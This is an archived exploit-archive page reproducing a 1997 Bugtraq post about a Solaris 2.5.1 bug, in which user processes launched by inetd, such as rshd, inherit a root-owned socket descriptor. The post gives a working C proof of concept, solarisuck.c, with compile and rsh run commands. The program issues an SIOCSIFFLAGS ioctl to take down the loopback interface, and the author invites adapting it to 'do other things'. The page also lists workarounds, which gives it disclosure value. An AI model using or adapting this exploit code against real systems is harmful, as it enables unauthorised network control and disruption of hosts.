Solaris root socket descriptor bug
Description: | You can swipe control of a root owned socket descriptor from user-owned inetd processes like rshd. |
Author: | Alan Cox (alan@LXORGUK.UKUU.ORG.UK) |
Compromise: | control of a root owned socket |
Vulnerable Systems: | Solaris 2.5.1, probably earlier versions. I hear that 2.6 if fixed. Sun doesn't seem interested in fixing this, for some reason. |
Date: | 19 June 1997 was the data of this post, although Alan has been complaining about the bug for ages. |
Notes: | You may have to change your interface to le0, hme0, or whatever to make it work. |
Solaris 2.5.1 party piece
Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Thu, 19 Jun 1997 15:27:39 +0100
Next in thread: Doug Hughes: "Re: Solaris 2.5.1 party piece"
Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it
cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck
solarisuck.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
struct ifreq please_break_me;
strcpy( please_break_me.ifr_name, "lo0");
please_break_me.ifr_flags=0;
if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
perror("Damn it didnt work. Obviously not Solaris ;)");
}
You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.
Workarounds:
1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc
2. Run an OS that the vendor doesnt take a year to fix bugs in
I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.
Alan
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: